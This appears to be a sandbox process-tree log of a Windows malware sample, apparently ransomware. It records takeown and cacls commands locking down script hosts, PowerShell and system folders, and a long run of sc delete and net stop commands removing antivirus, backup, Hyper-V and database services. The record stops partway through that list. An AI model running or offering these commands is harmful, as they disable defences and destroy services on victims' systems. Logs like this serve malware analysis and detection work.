C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2984

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Users:r
4⤵
PID:4732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4884

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
4⤵
PID:4924

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d SERVICE
4⤵
PID:3396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3940

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
4⤵
PID:3932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1056

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d "network service"
4⤵
PID:2876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d system
4⤵
PID:4972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4880

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
4⤵
PID:1412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:3556

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\FTP.exe /a
4⤵
- Modifies file permissions
PID:1136

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
4⤵
PID:4208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4256

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
4⤵
PID:248

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
4⤵
PID:280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4128

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
4⤵
PID:1168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1804

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
4⤵
PID:1220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:1648

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
4⤵
PID:96

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d system
4⤵
PID:692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1232

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
4⤵
PID:408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:3696

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\wscript.exe /a
4⤵
- Modifies file permissions
PID:2872

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /g Administrators:f
4⤵
PID:2068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1564

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Users:r
4⤵
PID:4688

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
4⤵
PID:3940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1136

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d SERVICE
4⤵
PID:1172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4700

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
4⤵
PID:2612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4484

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d "network service"
4⤵
PID:4160

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d system
4⤵
PID:2652

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
4⤵
PID:4896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:1020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4340

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\wscript.exe /a
4⤵
- Modifies file permissions
PID:4692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
4⤵
PID:5056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4216

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
4⤵
PID:540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1008

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
4⤵
PID:196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4776

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
4⤵
PID:3584

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
4⤵
PID:2352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:3032

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
4⤵
PID:3800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:992

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d system
4⤵
PID:3576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:2672

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
4⤵
PID:1340

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cscript.exe /a
4⤵
- Modifies file permissions
PID:4888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1804

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /g Administrators:f
4⤵
PID:276

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Users:r
4⤵
PID:1136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:540

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
4⤵
PID:2856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2324

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d SERVICE
4⤵
PID:4448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2544

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
4⤵
PID:4368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4064

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d "network service"
4⤵
PID:4460

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d system
4⤵
PID:2816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2228

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
4⤵
PID:4120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4136

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cscript.exe /a
4⤵
- Modifies file permissions
PID:4452

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
4⤵
PID:3556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4992

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
4⤵
PID:4124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4436

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
4⤵
PID:1168

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5580

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
4⤵
PID:1396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1172

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
4⤵
PID:3324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:3020

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
4⤵
PID:1232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2516

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d system
4⤵
PID:4696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:2872

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
4⤵
PID:4468

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
4⤵
- Modifies file permissions
PID:3592

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
4⤵
PID:3724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3320

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
4⤵
PID:3816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4728

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
4⤵
PID:4156

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
4⤵
PID:4900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4024

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
4⤵
PID:628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:2856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
4⤵
PID:2912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1084

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
4⤵
PID:4740

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
4⤵
PID:4120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4896

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
4⤵
- Modifies file permissions
PID:3356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4992

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
4⤵
PID:2300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1152

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
4⤵
PID:1236

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
4⤵
PID:1560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2040

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
4⤵
PID:2644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2160

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
4⤵
PID:3584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:1460

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
4⤵
PID:2524

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
4⤵
PID:2912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:2652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:3792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
4⤵
PID:4368

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\ProgramData /a
4⤵
- Modifies file permissions
PID:4612

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /g Administrators:f
4⤵
PID:4760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3032

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Users:r
4⤵
PID:3980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3208

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Administrators:r
4⤵
PID:4896

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d SERVICE
4⤵
PID:4688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:3928

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssqlserver
4⤵
PID:2104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:416

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d "network service"
4⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:4732

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d system
4⤵
PID:3320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:3556

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssql$sqlexpress
4⤵
PID:192

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Users\Public /a
4⤵
- Modifies file permissions
PID:4208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:1740

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /g Administrators:f
4⤵
PID:4244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:5492

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Users:r
4⤵
PID:5500

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Administrators:r
4⤵
PID:5528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:5520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
5⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:5672

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d SERVICE
4⤵
PID:5728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:5852

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssqlserver
4⤵
PID:5772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d "network service"
4⤵
PID:5796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:5748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
4⤵
PID:5828

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d system
4⤵
PID:5840

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssql$sqlexpress
4⤵
PID:5908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:5888

C:\Windows\SysWOW64\sc.exe
sc delete "vmickvpexchange"
4⤵
- Launches sc.exe
PID:644

C:\Windows\SysWOW64\sc.exe
sc delete "vmicguestinterface"
4⤵
PID:7020

C:\Windows\SysWOW64\sc.exe
sc delete "vmicshutdown"
4⤵
PID:2912

C:\Windows\SysWOW64\sc.exe
sc delete "vmicheartbeat"
4⤵
- Launches sc.exe
PID:5972

C:\Windows\SysWOW64\sc.exe
sc delete "vmicrdv"
4⤵
PID:2876

C:\Windows\SysWOW64\sc.exe
sc delete "storflt"
4⤵
PID:2632

C:\Windows\SysWOW64\sc.exe
sc delete "vmictimesync"
4⤵
PID:1348

C:\Windows\SysWOW64\sc.exe
sc delete "vmicvss"
4⤵
PID:5028

C:\Windows\SysWOW64\sc.exe
sc delete "hvdsvc"
4⤵
PID:3368

C:\Windows\SysWOW64\sc.exe
sc delete "nvspwmi"
4⤵
PID:3516

C:\Windows\SysWOW64\sc.exe
sc delete "wmms"
4⤵
PID:3704

C:\Windows\SysWOW64\sc.exe
sc delete "AvgAdminServer"
4⤵
PID:5088

C:\Windows\SysWOW64\sc.exe
sc delete "AVG Antivirus"
4⤵
PID:3680

C:\Windows\SysWOW64\sc.exe
sc delete "avgAdminClient"
4⤵
- Launches sc.exe
PID:2292

C:\Windows\SysWOW64\sc.exe
sc delete "SAVService"
4⤵
PID:6028

C:\Windows\SysWOW64\sc.exe
sc delete "SAVAdminService"
4⤵
- Launches sc.exe
PID:4728

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos AutoUpdate Service"
4⤵
PID:1236

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Clean Service"
4⤵
PID:5720

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Device Control Service"
4⤵
PID:5500

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
4⤵
- Launches sc.exe
PID:6028

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos File Scanner Service"
4⤵
PID:5736

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Health Service"
4⤵
PID:5580

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Agent"
4⤵
- Launches sc.exe
PID:5744

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Client"
4⤵
PID:5696

C:\Windows\SysWOW64\sc.exe
sc delete "SntpService"
4⤵
PID:5784

C:\Windows\SysWOW64\sc.exe
sc delete "swc_service"
4⤵
- Launches sc.exe
PID:5184

C:\Windows\SysWOW64\sc.exe
sc delete "swi_service"
4⤵
PID:5640

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos UI"
4⤵
PID:5656

C:\Windows\SysWOW64\sc.exe
sc delete "swi_update"
4⤵
PID:6608

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Web Control Service"
4⤵
PID:1596

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos System Protection Service"
4⤵
PID:368

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Safestore Service"
4⤵
- Launches sc.exe
PID:972

C:\Windows\SysWOW64\sc.exe
sc delete "hmpalertsvc"
4⤵
PID:6876

C:\Windows\SysWOW64\sc.exe
sc delete "RpcEptMapper"
4⤵
PID:5868

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
4⤵
PID:7096

C:\Windows\SysWOW64\sc.exe
sc delete "SophosFIM"
4⤵
PID:5536

C:\Windows\SysWOW64\sc.exe
sc delete "swi_filter"
4⤵
- Launches sc.exe
PID:4272

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdGuardianDefaultInstance"
4⤵
PID:3500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeDiagnostics
5⤵
PID:4988

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdServerDefaultInstance"
4⤵
- Launches sc.exe
PID:5028

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
4⤵
PID:6988

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLSERVER"
4⤵
PID:3520

C:\Windows\SysWOW64\sc.exe
sc delete "SQLSERVERAGENT"
4⤵
PID:5604

C:\Windows\SysWOW64\sc.exe
sc delete "SQLBrowser"
4⤵
PID:5508

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY"
4⤵
PID:4452

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.2
5⤵
PID:7108

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer130"
4⤵
PID:3664

C:\Windows\SysWOW64\sc.exe
sc delete "SSISTELEMETRY130"
4⤵
PID:3980

C:\Windows\SysWOW64\sc.exe
sc delete "SQLWriter"
4⤵
PID:6048

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$VEEAMSQL2012"
4⤵
PID:5396

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$VEEAMSQL2012"
4⤵
PID:4400

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent"
4⤵
PID:3724

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL"
4⤵
PID:6936

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerADHelper100"
4⤵
PID:276

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerOLAPService"
4⤵
PID:5944

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer100"
4⤵
PID:5804

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer"
4⤵
PID:6860

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY$HL"
4⤵
PID:7140

C:\Windows\SysWOW64\sc.exe
sc delete "TMBMServer"
4⤵
PID:6916

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$PROGID"
4⤵
- Launches sc.exe
PID:7028

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$WOLTERSKLUWER"
4⤵
PID:6900

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$PROGID"
4⤵
PID:6840

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$WOLTERSKLUWER"
4⤵
- Launches sc.exe
PID:7104

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher$OPTIMA"
4⤵
PID:5456

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$OPTIMA"
4⤵
- Launches sc.exe
PID:5884

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$OPTIMA"
4⤵
- Launches sc.exe
PID:5200

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer$OPTIMA"
4⤵
PID:4940

C:\Windows\SysWOW64\sc.exe
sc delete "msftesql$SQLEXPRESS"
4⤵
- Launches sc.exe
PID:4456

C:\Windows\SysWOW64\sc.exe
sc delete "postgresql-x64-9.4"
4⤵
PID:3584

C:\Windows\SysWOW64\sc.exe
sc delete "WRSVC"
4⤵
PID:2500

C:\Windows\SysWOW64\sc.exe
sc delete "ekrn"
4⤵
PID:5400

C:\Windows\SysWOW64\sc.exe
sc delete "ekrnEpsw"
4⤵
- Launches sc.exe
PID:6132

C:\Windows\SysWOW64\sc.exe
sc delete "klim6"
4⤵
PID:852

C:\Windows\SysWOW64\sc.exe
sc delete "AVP18.0.0"
4⤵
PID:1696

C:\Windows\SysWOW64\sc.exe
sc delete "KLIF"
4⤵
- Launches sc.exe
PID:1056

C:\Windows\SysWOW64\sc.exe
sc delete "klpd"
4⤵
- Launches sc.exe
PID:3320

C:\Windows\SysWOW64\sc.exe
sc delete "klflt"
4⤵
PID:3184

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupdisk"
4⤵
- Launches sc.exe
PID:1316

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupflt"
4⤵
- Launches sc.exe
PID:6136

C:\Windows\SysWOW64\sc.exe
sc delete "klkbdflt"
4⤵
PID:1632

C:\Windows\SysWOW64\sc.exe
sc delete "klmouflt"
4⤵
PID:6056

C:\Windows\SysWOW64\sc.exe
sc delete "klhk"
4⤵
PID:4136

C:\Windows\SysWOW64\sc.exe
sc delete "KSDE1.0.0"
4⤵
- Launches sc.exe
PID:2672

C:\Windows\SysWOW64\sc.exe
sc delete "kltap"
4⤵
PID:4220

C:\Windows\SysWOW64\sc.exe
sc delete "ScSecSvc"
4⤵
PID:1592

C:\Windows\SysWOW64\sc.exe
sc delete "Core Mail Protection"
4⤵
PID:4432

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning Server"
4⤵
PID:2812

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning ServerEx"
4⤵
PID:4208

C:\Windows\SysWOW64\sc.exe
sc delete "Online Protection System"
4⤵
PID:4356

C:\Windows\SysWOW64\sc.exe
sc delete "RepairService"
